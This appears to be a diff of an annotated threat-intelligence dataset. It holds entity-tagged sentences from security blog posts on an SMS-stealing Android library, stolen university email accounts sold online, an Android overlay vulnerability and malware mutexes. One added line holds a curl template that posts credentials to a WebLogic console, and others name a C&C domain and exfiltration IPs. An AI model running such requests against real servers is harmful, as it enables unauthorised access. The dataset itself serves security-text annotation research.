Compromise","entities":[{"id":45877,"label":"attack-pattern","start_offset":1,"end_offset":13},{"id":45879,"label":"attack-pattern","start_offset":84,"end_offset":109},{"id":45885,"label":"attack-pattern","start_offset":238,"end_offset":258},{"id":45889,"label":"attack-pattern","start_offset":387,"end_offset":405},{"id":45891,"label":"identity","start_offset":436,"end_offset":443},{"id":45876,"label":"malware","start_offset":70,"end_offset":83},{"id":45878,"label":"identity","start_offset":24,"end_offset":69},{"id":45880,"label":"attack-pattern","start_offset":119,"end_offset":144},{"id":45881,"label":"attack-pattern","start_offset":157,"end_offset":171},{"id":45882,"label":"attack-pattern","start_offset":179,"end_offset":201},{"id":45883,"label":"attack-pattern","start_offset":202,"end_offset":213},{"id":45884,"label":"identity","start_offset":217,"end_offset":237},{"id":45886,"label":"identity","start_offset":263,"end_offset":281},{"id":45887,"label":"attack-pattern","start_offset":373,"end_offset":379},{"id":45888,"label":"attack-pattern","start_offset":381,"end_offset":385}],"relations":[{"id":130,"from_id":45877,"to_id":45878,"type":"targets"}],"Comments":[]} {"id":965,"text":"If the device has just booted, it will start the service MySd2e, which then registers a receiver for Rf2b as shown in Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":966,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":967,"text":"MySd2e Service registers receiver for Rf2b ","entities":[],"relations":[],"Comments":[]} -{"id":968,"text":"SMS information collected by the receiver is saved in a hashmap with “other” as the key and sent to a method that uploads the message to 112.126.69.51 as shown in Figure 4.","entities":[{"id":3036,"label":"IPV4","start_offset":137,"end_offset":150}],"relations":[],"Comments":[]} -{"id":969,"text":" Figure 4. Information uploaded to IP Address used by api.taomike.com ","entities":[{"id":44914,"label":"DOMAIN","start_offset":54,"end_offset":69}],"relations":[],"Comments":[]} -{"id":970,"text":"All SMS messages sent to the phone are uploaded, not just those that are relevant to Taomike’s platform.","entities":[{"id":46470,"label":"identity","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} -{"id":971,"text":"Figure 5 shows a packet capture of a test message upload.","entities":[],"relations":[],"Comments":[]} -{"id":972,"text":"The message content is “hey test msg” as circled with dashed red box.","entities":[],"relations":[],"Comments":[]} -{"id":973,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":974,"text":"SMS uploaded via HTTP in pcap The Taomike library makes contact with the following URLs, but only the “2c.php” path is used to capture SMS messages.","entities":[{"id":3051,"label":"attack-pattern","start_offset":128,"end_offset":148},{"id":46472,"label":"FILEPATH","start_offset":104,"end_offset":110},{"id":46471,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} -{"id":975,"text":"The rest appear to be used for other parts of the IAP functionality in the library.","entities":[],"relations":[],"Comments":[]} -{"id":976,"text":"Risks and Mitigation ","entities":[],"relations":[],"Comments":[]} -{"id":977,"text":"We have captured over 18,000 samples that contain the SMS stealing library since August 2015, meaning the number of affected users is considerable.","entities":[{"id":46473,"label":"TIME","start_offset":81,"end_offset":92},{"id":46474,"label":"attack-pattern","start_offset":54,"end_offset":66}],"relations":[],"Comments":[]} -{"id":978,"text":"We expect the number of affected apps and users to increase as more developers incorporate the newer version of Taomike library.","entities":[{"id":46475,"label":"identity","start_offset":112,"end_offset":119}],"relations":[],"Comments":[]} -{"id":979,"text":" The infected apps are not limited to a single developer or third party store as many developers appear use the Taomike library.","entities":[{"id":46476,"label":"identity","start_offset":112,"end_offset":119}],"relations":[],"Comments":[]} -{"id":980,"text":"Some of the infected apps purport to contain or display adult content.","entities":[],"relations":[],"Comments":[]} -{"id":981,"text":" We do not know how Taomike is using the stolen SMS messages, but no library should capture all messages and send them to a system outside the phone.","entities":[{"id":46477,"label":"identity","start_offset":20,"end_offset":27}],"relations":[],"Comments":[]} -{"id":982,"text":"In version 4.4 of Android (KitKat) Google began preventing apps from capturing SMS messages unless they were defined as the “default” SMS app.","entities":[{"id":46479,"label":"identity","start_offset":35,"end_offset":41},{"id":46478,"label":"SOFTWARE","start_offset":18,"end_offset":34}],"relations":[],"Comments":[]} -{"id":983,"text":" Users outside of China and those that only download apps from the official Google Play store are not at risk from this threat. ","entities":[{"id":46480,"label":"SOFTWARE","start_offset":76,"end_offset":87},{"id":46481,"label":"location","start_offset":18,"end_offset":23}],"relations":[],"Comments":[]} -{"id":984,"text":"To protect Palo Alto Networks customers from the Taomike SMS stealer, we’ve made the following protections available:","entities":[{"id":44915,"label":"identity","start_offset":11,"end_offset":29},{"id":44916,"label":"malware","start_offset":49,"end_offset":68}],"relations":[],"Comments":[]} -{"id":985,"text":" Conclusion Even popular third party monetization platforms are not always trustworthy.","entities":[],"relations":[],"Comments":[]} -{"id":986,"text":"When developers incorporate the libraries into their apps they need to carefully test them and monitor for any abnormal activities.","entities":[],"relations":[],"Comments":[]} -{"id":987,"text":"Identifying monetization and advertising platforms that behave poorly and abuse their users is something that our industry must to do ensure the safety of all mobile devices and their users.","entities":[],"relations":[],"Comments":[]} -{"id":988,"text":" Acknowledgement We greatly appreciate the help from Rongbo Shao from Palo Alto Networks in working on the Threat Prevention signature.","entities":[{"id":46482,"label":"identity","start_offset":71,"end_offset":89},{"id":46483,"label":"identity","start_offset":54,"end_offset":65}],"relations":[],"Comments":[]} -{"id":989,"text":"We would also like to thank Ryan Olson, Benjamin Small, Richar Wartell, and Chris Clark from Palo Alto networks in publishing the discovery.","entities":[{"id":46484,"label":"identity","start_offset":28,"end_offset":38},{"id":46485,"label":"identity","start_offset":40,"end_offset":54},{"id":46486,"label":"identity","start_offset":56,"end_offset":70},{"id":46487,"label":"identity","start_offset":76,"end_offset":87},{"id":46488,"label":"identity","start_offset":93,"end_offset":111}],"relations":[],"Comments":[]} -{"id":990,"text":" Related Sample Hash Values Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":991,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":992,"text":"Recently, we found email accounts from top universities across the world being sold on Taobao, the largest consumer-to-consumer (C2C) e-commerce platform in China.","entities":[{"id":46489,"label":"SOFTWARE","start_offset":87,"end_offset":93},{"id":46490,"label":"location","start_offset":157,"end_offset":162}],"relations":[{"id":194,"from_id":46489,"to_id":46490,"type":"located-at"}],"Comments":[]} -{"id":993,"text":"Advertised uses for these accounts included registering for special accounts under software developer programs, receiving student discounts or coupons from retailers, and obtaining access to academic databases.","entities":[],"relations":[],"Comments":[]} -{"id":994,"text":" This post describes the scope, associated risks, and implications of this activity.","entities":[],"relations":[],"Comments":[]} -{"id":995,"text":" Our investigation began with a Chinese language search for \"edu mailbox\" in Taobao, which returned 99 results related to stolen university email accounts.","entities":[{"id":46491,"label":"SOFTWARE","start_offset":77,"end_offset":83}],"relations":[],"Comments":[]} -{"id":996,"text":"The most expensive account was listed at ¥2400 RMB ($390.80 USD), while the cheapest was only ¥0.98 RMB ($0.16 USD). Figure 1: Results for Chinese language \"edu mailbox\" search on Taobao.","entities":[{"id":46492,"label":"SOFTWARE","start_offset":181,"end_offset":187}],"relations":[],"Comments":[]} -{"id":997,"text":" These accounts, which include an education (EDU) top-level domain email address with valid password, represent 42 of the world’s top universities, across 10 countries: ","entities":[],"relations":[],"Comments":[]} -{"id":999,"text":"The descriptions for these items proposed three main uses for buyers: ","entities":[],"relations":[],"Comments":[]} -{"id":1000,"text":"1. Registering for special accounts under software developer programs:","entities":[],"relations":[],"Comments":[]} -{"id":1001,"text":"For example, the most popular account type, which has been bought at least 569 times, was advertised as a Microsoft’s student Windows Phone 7 and 8 developer account.","entities":[{"id":46504,"label":"identity","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} -{"id":1002,"text":"By using this kind of account, a user can perform a developer unlock on their Windows Phone devices without incurring a fee.","entities":[],"relations":[],"Comments":[]} -{"id":1003,"text":"Most reviews of this package were favorable, with comments like \"very good to use\" or \"with seller’s help I can unlock my phone now.\"","entities":[],"relations":[],"Comments":[]} -{"id":1004,"text":" Figure 2: The most popular account type has sold at least 569 times.","entities":[],"relations":[],"Comments":[]} -{"id":1005,"text":"2. Receiving student discounts or coupons from retailers:","entities":[],"relations":[],"Comments":[]} -{"id":1006,"text":"Some accounts advertised candidacy towards registration for student discount at retailers such as Amazon, BestBuy, Apple, and Dell.","entities":[{"id":46508,"label":"identity","start_offset":126,"end_offset":130},{"id":46507,"label":"identity","start_offset":115,"end_offset":120},{"id":46505,"label":"identity","start_offset":98,"end_offset":104},{"id":46506,"label":"identity","start_offset":106,"end_offset":113}],"relations":[],"Comments":[]} -{"id":1007,"text":"For example, the standard annual fee for Amazon Prime is $99 USD; however, with the student discount, a buyer could enjoy it for free the first six months and then renew at half price for subsequent years.","entities":[{"id":46509,"label":"identity","start_offset":41,"end_offset":53}],"relations":[],"Comments":[]} -{"id":1008,"text":"Figure 3: The seller showed how to register for student discount accounts.","entities":[],"relations":[],"Comments":[]} -{"id":1009,"text":"3. Obtaining access to academic databases:","entities":[],"relations":[],"Comments":[]} -{"id":1010,"text":"Accounts for big universities (e.g., MIT, Stanford, etc.) are mainly used to access respective library services and resources, \"including research help, study spaces, print and electronic books\/journals and more.\"","entities":[{"id":46511,"label":"identity","start_offset":42,"end_offset":50},{"id":46510,"label":"identity","start_offset":37,"end_offset":40}],"relations":[],"Comments":[]} -{"id":1011,"text":"Figure 4:","entities":[],"relations":[],"Comments":[]} -{"id":1012,"text":"A seller advertises how an MIT account can be used to access online library resources.","entities":[{"id":46512,"label":"identity","start_offset":27,"end_offset":30}],"relations":[],"Comments":[]} -{"id":1013,"text":" We talked with some sellers through AliWangWang, an instant message (IM) system developed by Taobao for online trading.","entities":[{"id":46513,"label":"SOFTWARE","start_offset":37,"end_offset":48},{"id":46514,"label":"identity","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} -{"id":1014,"text":"A well-stocked seller told us that every account he sold belonged to an active student at the respective university.","entities":[],"relations":[],"Comments":[]} -{"id":1015,"text":"He claimed that once the account was sold, only the one buyer and the legitimate user would have access.","entities":[],"relations":[],"Comments":[]} -{"id":1016,"text":"He recommended not changing the account password to avoid detection by the legitimate user.","entities":[],"relations":[],"Comments":[]} -{"id":1017,"text":"Another seller offered to provide real identity information for a stolen account so the buyer could change the corresponding password and security questions.","entities":[],"relations":[],"Comments":[]} -{"id":1018,"text":"This type of account access was the most expensive and least flexible in terms of customization (i.e., username, institution, etc.).","entities":[],"relations":[],"Comments":[]} -{"id":1019,"text":"Additionally, it should be noted that there is value beyond the EDU account itself for password and security question information, in the event they are shared across other online accounts for the legitimate user.","entities":[],"relations":[],"Comments":[]} -{"id":1020,"text":" Other sellers were also able to offer customizable email accounts from a specific domain\/institution.","entities":[],"relations":[],"Comments":[]} -{"id":1021,"text":"Figure 5: A seller advertising a customizable “xxx.edu” email account.","entities":[],"relations":[],"Comments":[]} -{"id":1022,"text":"In the above advertisement, the seller describes the ability to choose an account under a subdomain (academia, student, me, email, or contact) of the requested domain.","entities":[],"relations":[],"Comments":[]} -{"id":1023,"text":"The price for this custom account was only ¥27 RMB ($4.40 USD); for an extra ¥13 RMB ($2.12 USD), the buyer can request a custom username at any subdomain for the given institution.","entities":[],"relations":[],"Comments":[]} -{"id":1024,"text":" To further assess this threat, we purchased a customized, new account from a seller on Taobao.","entities":[{"id":46515,"label":"SOFTWARE","start_offset":88,"end_offset":94}],"relations":[],"Comments":[]} -{"id":1025,"text":"Four hours later, we received confirmation that the custom email address \"claud@student.cnri.edu\" was active.","entities":[{"id":3215,"label":"TIME","start_offset":0,"end_offset":16},{"id":46516,"label":"EMAIL","start_offset":74,"end_offset":96}],"relations":[],"Comments":[]} -{"id":1026,"text":"Navigating to CNRI’s webmail page, we were then able to successfully access and send an email from that account.","entities":[{"id":46517,"label":"identity","start_offset":14,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1027,"text":" Figure 6: Sending an email through a newly bought customized EDU account.","entities":[],"relations":[],"Comments":[]} -{"id":1028,"text":" Another noteworthy trend we observed was that some sellers provided email addresses with customizable usernames at \"californiacolleges.edu\".","entities":[{"id":46518,"label":"DOMAIN","start_offset":117,"end_offset":139}],"relations":[],"Comments":[]} -{"id":1029,"text":"In fact, anyone can do the same by visiting the California Colleges Create an Account page.","entities":[{"id":44918,"label":"identity","start_offset":48,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1030,"text":"Accounts made through this site \"can be used to apply [for] related memberships of Amazon Prime, Microsoft Developer, Adobe and Apple by some secret ways,\" one seller said.","entities":[{"id":46519,"label":"identity","start_offset":83,"end_offset":95},{"id":46522,"label":"identity","start_offset":128,"end_offset":133},{"id":46520,"label":"identity","start_offset":97,"end_offset":106},{"id":46521,"label":"identity","start_offset":118,"end_offset":123}],"relations":[],"Comments":[]} -{"id":1031,"text":" Figure 7: Using a newly created California Colleges account.","entities":[{"id":46523,"label":"identity","start_offset":33,"end_offset":52}],"relations":[],"Comments":[]} -{"id":1032,"text":"As with most criminal enterprises, not all sellers on Taobao use their real identity, presenting a challenge in tracking down the individuals behind this activity.","entities":[{"id":46524,"label":"SOFTWARE","start_offset":54,"end_offset":60}],"relations":[],"Comments":[]} -{"id":1033,"text":"In order to sell anything on Taobao, a seller must at least create a valid Alipay account (similar to PayPal) linked to a valid Chinese citizen ID number (similar to a U.S. Social Security number), and then associate it with a valid Chinese bank account under the same citizen ID.","entities":[{"id":46526,"label":"SOFTWARE","start_offset":75,"end_offset":81},{"id":46525,"label":"SOFTWARE","start_offset":29,"end_offset":35},{"id":46527,"label":"SOFTWARE","start_offset":102,"end_offset":108}],"relations":[],"Comments":[]} -{"id":1034,"text":"However, identity theft is a global concern and the Chinese citizen ID is no exception, allowing for potential sellers to simply purchase a usable identity online.","entities":[{"id":46528,"label":"attack-pattern","start_offset":8,"end_offset":23}],"relations":[],"Comments":[]} -{"id":1035,"text":" Based on our investigation, we believe that stolen accounts for these universities are actively selling on Taobao.","entities":[{"id":44920,"label":"SOFTWARE","start_offset":108,"end_offset":114},{"id":44921,"label":"attack-pattern","start_offset":45,"end_offset":60}],"relations":[{"id":195,"from_id":44921,"to_id":44920,"type":"related-to"}],"Comments":[]} -{"id":1036,"text":"On August 27, we reported our findings to Taobao.","entities":[{"id":46529,"label":"TIME","start_offset":3,"end_offset":12},{"id":46530,"label":"SOFTWARE","start_offset":42,"end_offset":48}],"relations":[],"Comments":[]} -{"id":1037,"text":"Their response was that they were addressing this issue and have already removed a number of these items, with the remainder requiring further investigation.","entities":[],"relations":[],"Comments":[]} -{"id":1038,"text":"However, this malicious seller activity may also reveal a larger scale problem within university systems.","entities":[],"relations":[],"Comments":[]} -{"id":1039,"text":"Through the types of accounts advertised on Taobao, an attacker can steal a student or staff account, assume their identity, and gain unauthorized access to standard university resources.","entities":[{"id":46531,"label":"SOFTWARE","start_offset":43,"end_offset":50}],"relations":[],"Comments":[]} -{"id":1040,"text":"More sophisticated and nefarious uses include leveraging accounts in social engineering\/phishing attacks or exploiting access to high-value university systems (e.g., personnel, financial, research) to steal information.","entities":[{"id":46533,"label":"attack-pattern","start_offset":88,"end_offset":104},{"id":46534,"label":"attack-pattern","start_offset":69,"end_offset":87},{"id":46535,"label":"attack-pattern","start_offset":108,"end_offset":125},{"id":46536,"label":"attack-pattern","start_offset":201,"end_offset":218}],"relations":[],"Comments":[]} -{"id":1041,"text":"Fortunately, a number of the institutions impacted by this activity have already implemented two-factor authentication for high-value resources, reducing the risk of the latter.","entities":[],"relations":[],"Comments":[]} -{"id":1042,"text":"Yet, we believe the residual risk and exposure call for further action.","entities":[],"relations":[],"Comments":[]} -{"id":1043,"text":" The following are our suggestions for discovering and mitigating risks associated with this activity: Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1044,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":1045,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1046,"text":"This post is also available in: 日本語 (Japanese) Today, Palo Alto Networks Unit 42 researchers are announcing details on a new high- severity vulnerability affecting the Google Android platform.","entities":[{"id":46537,"label":"identity","start_offset":60,"end_offset":98},{"id":46538,"label":"SOFTWARE","start_offset":174,"end_offset":197}],"relations":[],"Comments":[]} -{"id":1047,"text":"Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin.","entities":[{"id":44922,"label":"TIME","start_offset":60,"end_offset":74},{"id":44923,"label":"SOFTWARE","start_offset":75,"end_offset":83}],"relations":[],"Comments":[]} -{"id":1048,"text":"This new vulnerability does NOT affect Android 8.0 Oreo, the latest version; but it does affect all prior versions of Android.","entities":[{"id":46539,"label":"SOFTWARE","start_offset":39,"end_offset":55},{"id":46540,"label":"SOFTWARE","start_offset":118,"end_offset":124}],"relations":[],"Comments":[]} -{"id":1049,"text":"There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time.","entities":[{"id":46541,"label":"identity","start_offset":79,"end_offset":105}],"relations":[],"Comments":[]} -{"id":1050,"text":"Since Android 8.0 is a relatively recent release, this means that nearly all Android users should take action today and apply updates that are available to address this vulnerability.","entities":[{"id":44924,"label":"SOFTWARE","start_offset":6,"end_offset":17},{"id":44925,"label":"SOFTWARE","start_offset":77,"end_offset":84}],"relations":[],"Comments":[]} -{"id":1051,"text":" What our researchers have found is a vulnerability that can be used to more easily enable an “overlay attack,” a type of attack that is already known on the Android platform.","entities":[{"id":46543,"label":"SOFTWARE","start_offset":158,"end_offset":165}],"relations":[],"Comments":[]} -{"id":1052,"text":"This type of attack is most likely to be used to get malicious software on the user’s Android device.","entities":[{"id":46544,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} -{"id":1053,"text":"This type of attack can also be used to give malicious software total control over the device.","entities":[],"relations":[],"Comments":[]} -{"id":1054,"text":"In a worst-case attack scenario, this vulnerability could be used to render the phone unusable (i.e., a “brick”) or to install any kind of malware including (but not limited to) ransomware or information stealers.","entities":[],"relations":[],"Comments":[]} -{"id":1055,"text":"In simplest terms, this vulnerability could be used to take control of devices, lock devices and steal information after it is attacked.","entities":[{"id":46545,"label":"attack-pattern","start_offset":55,"end_offset":78},{"id":46547,"label":"attack-pattern","start_offset":80,"end_offset":92},{"id":46546,"label":"attack-pattern","start_offset":97,"end_offset":114}],"relations":[],"Comments":[]} -{"id":1056,"text":"An “overlay attack” is an attack where an attacker’s app draws a window over (or “overlays”) other windows and apps running on the device.","entities":[{"id":44926,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1057,"text":"When done successfully, this can enable an attacker to convince the user he or she is clicking one window when, in fact, he or she is actually clicking another window.","entities":[],"relations":[],"Comments":[]} -{"id":1058,"text":"In Figure 1, you can see an example where an attacker is making it appear that the user is clicking to install a patch when in fact the user is clicking to grant the Porn Droid malware full administrator permissions on the device.","entities":[{"id":46548,"label":"malware","start_offset":166,"end_offset":176}],"relations":[],"Comments":[]} -{"id":1059,"text":"Figure 1: Bogus patch installer overlying malware requesting administrative permissions ","entities":[],"relations":[],"Comments":[]} -{"id":1060,"text":"You can see how this attack can be used convince users to unwittingly install malware on the device.","entities":[],"relations":[],"Comments":[]} -{"id":1061,"text":"This can also be used to grant the malware full administrative privileges on the device.","entities":[],"relations":[],"Comments":[]} -{"id":1062,"text":" An overlay attack can also be used to create a denial-of-service condition on the device by raising windows on the device that don’t go away.","entities":[{"id":44927,"label":"attack-pattern","start_offset":48,"end_offset":65}],"relations":[],"Comments":[]} -{"id":1063,"text":"This is precisely the type of approach attackers use with ransomware attacks on mobile devices.","entities":[],"relations":[],"Comments":[]} -{"id":1064,"text":" Of course, an overlay attack can be used to accomplish all three of these in a single attack: Overlay attacks aren’t new; they’ve been discussed before.","entities":[],"relations":[],"Comments":[]} -{"id":1065,"text":"But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful: These are significant mitigating factors and so overlay attacks haven’t been reckoned a serious threat.","entities":[{"id":46549,"label":"identity","start_offset":51,"end_offset":55},{"id":44929,"label":"attack-pattern","start_offset":269,"end_offset":284},{"id":44930,"label":"attack-pattern","start_offset":148,"end_offset":163}],"relations":[],"Comments":[]} -{"id":1066,"text":" However, our new Unit 42 research shows that there is a way to carry out overlay attacks where these mitigating factors don’t apply.","entities":[{"id":46550,"label":"identity","start_offset":18,"end_offset":25}],"relations":[],"Comments":[]} -{"id":1067,"text":"If a malicious app were to utilize this new vulnerability, our researchers have found it could carry out an overlay attack simply by being installed on the device.","entities":[{"id":46551,"label":"attack-pattern","start_offset":108,"end_offset":122}],"relations":[],"Comments":[]} -{"id":1068,"text":"In particular, this means that malicious apps from websites and app stores other than Google Play can carry out overlay attacks.","entities":[{"id":46552,"label":"SOFTWARE","start_offset":86,"end_offset":98}],"relations":[],"Comments":[]} -{"id":1069,"text":"It’s important to note that apps from websites and app stores other than Google Play form a significant source of Android malware worldwide.","entities":[{"id":46553,"label":"SOFTWARE","start_offset":114,"end_offset":121},{"id":46554,"label":"SOFTWARE","start_offset":73,"end_offset":84}],"relations":[],"Comments":[]} -{"id":1070,"text":" The particular vulnerability in question affects an Android feature known as “Toast.” “Toast” is a type of notification window that “pops” (like toast) on the screen.","entities":[{"id":46555,"label":"SOFTWARE","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} -{"id":1071,"text":"“Toast” is typically used to display messages and notifications over other apps.","entities":[],"relations":[],"Comments":[]} -{"id":1072,"text":" Unlike other window types in Android, Toast doesn’t require the same permissions, and so the mitigating factors that applied to previous overlay attacks don’t apply here.","entities":[{"id":46556,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} -{"id":1073,"text":"Additionally, our researchers have outlined how it’s possible to create a Toast window that overlays the entire screen, so it’s possible to use Toast to create the functional equivalent of regular app windows.","entities":[],"relations":[],"Comments":[]} -{"id":1074,"text":" In light of this latest research, the risk of overlay attacks takes on a greater significance.","entities":[],"relations":[],"Comments":[]} -{"id":1075,"text":"Fortunately, the latest version of Android is immune from these attacks “out of the box.”","entities":[{"id":46557,"label":"SOFTWARE","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} -{"id":1076,"text":"However, most people who run Android run versions that are vulnerable.","entities":[{"id":46559,"label":"SOFTWARE","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} -{"id":1077,"text":"This means that it’s critical for all Android users on versions before 8.0 to get updates for their devices.","entities":[{"id":46560,"label":"SOFTWARE","start_offset":38,"end_offset":45}],"relations":[],"Comments":[]} -{"id":1078,"text":"You can get information on patch and update availability from your mobile carrier or handset maker.","entities":[],"relations":[],"Comments":[]} -{"id":1079,"text":" Of course, one of the best protections against malicious apps is to get your Android apps only from Google Play, as the Android Security Team aggressively screens against malicious apps and keeps them out of the store in the first place.","entities":[{"id":46562,"label":"SOFTWARE","start_offset":101,"end_offset":112},{"id":46561,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":46563,"label":"identity","start_offset":121,"end_offset":142}],"relations":[],"Comments":[]} -{"id":1080,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":4611,"text":" Fig - Potential Chopper Webshell Detection","entities":[{"id":50511,"label":"malware","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} +{"id":7355,"text":"The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times.","entities":[{"id":22875,"label":"TIME","start_offset":56,"end_offset":74},{"id":22876,"label":"location","start_offset":99,"end_offset":102}],"relations":[],"Comments":[]} +{"id":7587,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":3942,"text":"http:\/\/{ip address\\]:7001\/wls-wsat\/CoordinatorPortType Oracle Console curl.dat -vv http:\/\/{ip address}:7001\/console\/j_security_check -d j_username={username}&j_password={password}&submit=Login\"","entities":[{"id":49789,"label":"FILEPATH","start_offset":72,"end_offset":81},{"id":49787,"label":"URL","start_offset":0,"end_offset":54},{"id":49788,"label":"URL","start_offset":85,"end_offset":134}],"relations":[],"Comments":[]} +{"id":1293,"text":"It then sends the 'exit' command to this executable, which will kill this particular process.","entities":[],"relations":[],"Comments":[]} +{"id":7088,"text":"Parse HTTP packets HTTP Parser https:\/\/github.com\/nodejs\/http-parser ","entities":[{"id":22204,"label":"URL","start_offset":33,"end_offset":70}],"relations":[],"Comments":[]} +{"id":6238,"text":"The impact of spear-phishing attacks can be minimized by following security best practices, which include refraining from opening emails sent by suspicious sources.","entities":[{"id":19245,"label":"location","start_offset":4,"end_offset":10},{"id":19246,"label":"location","start_offset":14,"end_offset":19},{"id":19247,"label":"attack-pattern","start_offset":20,"end_offset":28},{"id":19248,"label":"location","start_offset":37,"end_offset":40},{"id":19249,"label":"location","start_offset":67,"end_offset":75},{"id":19250,"label":"location","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} +{"id":13466,"text":"Our team of analysts and security experts is focused on identifying and stopping issues like phishing campaigns, zero-day vulnerabilities and hacking against Google, our products and our users.","entities":[{"id":41953,"label":"location","start_offset":21,"end_offset":24},{"id":41954,"label":"location","start_offset":25,"end_offset":33},{"id":41955,"label":"location","start_offset":68,"end_offset":71},{"id":41956,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":41958,"label":"location","start_offset":138,"end_offset":141},{"id":41960,"label":"location","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} +{"id":13133,"text":"That means customers have to ask prospective providers like Trend Micro a mountain of questions.","entities":[{"id":48906,"label":"identity","start_offset":60,"end_offset":71}],"relations":[],"Comments":[]} +{"id":6954,"text":"Upon enabling the macro, it will then download the ObliqueRat malware that is hidden inside an image file.","entities":[{"id":21770,"label":"location","start_offset":28,"end_offset":32},{"id":21771,"label":"tools","start_offset":51,"end_offset":61}],"relations":[],"Comments":[]} +{"id":6217,"text":"We found that the returned script is a backdoor that gets its instructions from the WebSocket server.","entities":[],"relations":[],"Comments":[]} +{"id":7037,"text":"The launcher\u2019s behavior changes depending on the number of arguments passed to the executable.","entities":[],"relations":[],"Comments":[]} +{"id":1909,"text":"Instead of stealing documents or images, it works on top of a modified version of the legitimate Threema, an end-to-end encrypted messaging application, to steal screenshots of messages.","entities":[{"id":47032,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} +{"id":10140,"text":"The logo of the target organization has been removed from the screenshot and the color was changed as not to reveal the source.","entities":[{"id":30924,"label":"location","start_offset":16,"end_offset":22},{"id":30925,"label":"location","start_offset":73,"end_offset":76},{"id":30926,"label":"attack-pattern","start_offset":120,"end_offset":126}],"relations":[],"Comments":[]} +{"id":1182,"text":" don't stop me!","entities":[],"relations":[],"Comments":[]} +{"id":6718,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q1 of 2020.","entities":[],"relations":[],"Comments":[]} +{"id":6174,"text":"The email leverages the webmail system\u2019s search suggestion function to trigger the webpage to execute their script instead of directly running the malicious script.","entities":[],"relations":[],"Comments":[]} +{"id":2080,"text":" Taking a closer look at x4k\u2019s main OS, we believe it to be a customized Kali Linux instance, tailored to his needs.","entities":[{"id":47207,"label":"threat-actor","start_offset":25,"end_offset":29},{"id":47208,"label":"SOFTWARE","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} +{"id":12561,"text":"It then elevated privileges to install the payload.","entities":[],"relations":[],"Comments":[]} +{"id":4439,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} +{"id":8162,"text":" C&C Servers ms-ethics.net","entities":[],"relations":[],"Comments":[]} +{"id":13535,"text":"They must also be nominated by their organization's leadership and commit to the requirements imposed by the program.","entities":[],"relations":[],"Comments":[]} +{"id":4328,"text":"It downloads an ASCII file from the same domain and converts it into binary before loading it on to the memory and jump to a dynamic function.","entities":[],"relations":[],"Comments":[]} +{"id":11611,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[{"id":35592,"label":"malware","start_offset":83,"end_offset":90},{"id":35593,"label":"location","start_offset":113,"end_offset":116}],"relations":[],"Comments":[]} {"id":1081,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1082,"text":"Mutex analysis is an often overlooked and useful tool for malware author fingerprinting, family classification, and even discovery.","entities":[],"relations":[],"Comments":[]} -{"id":1083,"text":"Far from the hypothesized \"huge amount of variability\" in mutex names, likely hypothesized due to the seemingly random appearance of them, practical mutex usage is embarrassingly consistent.","entities":[],"relations":[],"Comments":[]} -{"id":1084,"text":"In fact, over 15% of all collected worms share a single mutex [2gvwnqjz].","entities":[],"relations":[],"Comments":[]} -{"id":1085,"text":" This blog was sourced from the data generated by the WildFire Analytics cloud, which processes thousands of samples a day and provides insights into various characteristics and behaviors of malware worldwide.","entities":[{"id":46564,"label":"SOFTWARE","start_offset":54,"end_offset":78}],"relations":[],"Comments":[]} -{"id":1086,"text":"But before we get into the details, here is a quick overview of mutexes and why they exist in the first place.","entities":[],"relations":[],"Comments":[]} -{"id":1087,"text":" The mutex is the fundamental tool for managing shared resources between multiple threads (or processes).","entities":[],"relations":[],"Comments":[]} -{"id":1088,"text":"If you think of the threads as a whole bunch of people in a meeting, all trying to talk at once, a mutex is the baton that gets passed from one person to the next so that there’s only one person talking at a time.","entities":[],"relations":[],"Comments":[]} -{"id":1089,"text":"The important thing to understand is what the mutex is really protecting.","entities":[],"relations":[],"Comments":[]} -{"id":1090,"text":"In the above 